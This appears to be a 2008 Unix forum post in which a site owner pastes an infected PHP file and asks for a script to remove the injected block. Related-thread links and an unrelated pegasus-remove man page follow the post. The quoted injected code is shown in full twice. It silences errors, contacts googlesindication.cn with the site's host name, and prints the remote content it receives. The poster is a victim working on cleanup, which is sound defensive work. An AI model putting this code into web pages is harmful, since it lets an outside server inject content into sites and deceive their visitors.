remove malicious codes from a file Post: 302171169

Sponsored Content

Top Forums Shell Programming and Scripting remove malicious codes from a file Post 302171169 by fed.linuxgossip on Wednesday 27th of February 2008 08:02:19 PM

02-27-2008

Registered User

cat test.php file
##########
<?php
phpinfo();
?>
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER['HTTP_HOST'];
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
$out .= "Host: googlesindication.cn\r\n";
$out .= "Connection: Keep-Alive\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$var .= fgets($fp, 128);
}
list($headers, $content) = explode("\r\n\r\n", $var);
print $content;
fclose($fp);
}
?>

In the above file I want to remove:

<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER['HTTP_HOST'];
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
$out .= "Host: googlesindication.cn\r\n";
$out .= "Connection: Keep-Alive\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$var .= fgets($fp, 128);
}
list($headers, $content) = explode("\r\n\r\n", $var);
print $content;
fclose($fp);
}
?>

So after removing the above part the resultant file looks like:

cat test.php file
##########
<?php
phpinfo();
?>

Can you please advise a script that will search or grep

$fn = "googlesindication.cn";

and then remove the entire php paragraph that it is enclosed with : starting
<?php
and ending
?>

Thanks

fed.linuxgossip

View Public Profile for fed.linuxgossip

Find all posts by fed.linuxgossip

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated...

2. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -...

3. Shell Programming and Scripting

Removal of HTML ASCII Codes from file

Hi all, I have a file with extended ASCII codes in the description which needs to be removed. List of extended ascii codes "�", "�", "�", "�", "�", "�", "-", "-", "�", "'", "�", "�", "�", "�","�", "�", "�", "...", "�", "�", "�" Sample data: Test Details-HAVE BEEN PUBLISHED...

4. UNIX for Dummies Questions & Answers

Display file with escaped color codes

Hi, I have a file containing color codes: Fri May 25 17:13:04 2012: Starting MTA: exim4^ Loading cpufreq kernel modules...^How can I display it colorized on a linux terminal?

5. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account

6. Debian

Malicious perl script

Relative newbie to Linux so please be kind and assume I've done little in the way of command line but i have been thrusted into this position. Here goes. There is a perl script on my box that is using me as a mail server. It is contacting other mail servers to the point of slowing down the box....

7. UNIX for Beginners Questions & Answers

How to remove unused html codes from the file using UNIX?

Hi All, We have a HTML source which will be processed using a informatica workflow. In between these two we have a Unix script which transforms the file. We are getting an error from past week in the informatica saying invalid format, because the file has unused html reference (0-8,14-31 etc)...

LEARN ABOUT DEBIAN

pegasus-remove

PEGASUS-REMOVE(1)														 PEGASUS-REMOVE(1)

NAME

       pegasus-remove - removes a workflow that has been planned and submitted using pegasus-plan and pegasus-run

SYNOPSIS

       pegasus-remove [-d dagid] [-v] [rundir]

DESCRIPTION

       The pegasus-remove command remove a submitted/running workflow that has been planned and submitted using pegasus-plan and pegasus-run. The
       command can be invoked either in the planned directory with no options and arguments or just the full path to the run directory.

OPTIONS

       By default pegasus-remove does not require any options or arguments if invoked from within the planned workflow directory. If running the
       command outside the workflow directory then a full path to the workflow directory needs to be specified or the dagid of the workflow to be
       removed.

       pegasus-remove takes the following options:

       -d dagid, --dagid dagid
	   The workflow dagid to remove

       -v, --verbose
	   Raises debug level. Each invocation increase the level by 1.

       rundir
	   Is the full qualified path to the base directory containing the planned workflow DAG and submit files. This is optional if
	   pegasus-remove command is invoked from within the run directory.

RETURN VALUE

       If the workflow is removed successfully pegasus-remove returns with an exit code of 0. However, in case of error, a non-zero exit code
       indicates problems. An error message clearly marks the cause.

FILES

       The following files are opened:

       braindump
	   This file is located in the rundir. pegasus-remove uses this file to find out paths to several other files.

ENVIRONMENT VARIABLES

       PATH
	   The path variable is used to locate binary for condor_rm.

SEE ALSO

       pegasus-plan(1), pegasus-run(1)

AUTHORS

       Gaurang Mehta <gmehta at isi dot edu>

       Jens-S. Vockler <voeckler at isi dot edu>

       Pegasus Team http://pegasus.isi.edu

								    05/24/2012							 PEGASUS-REMOVE(1)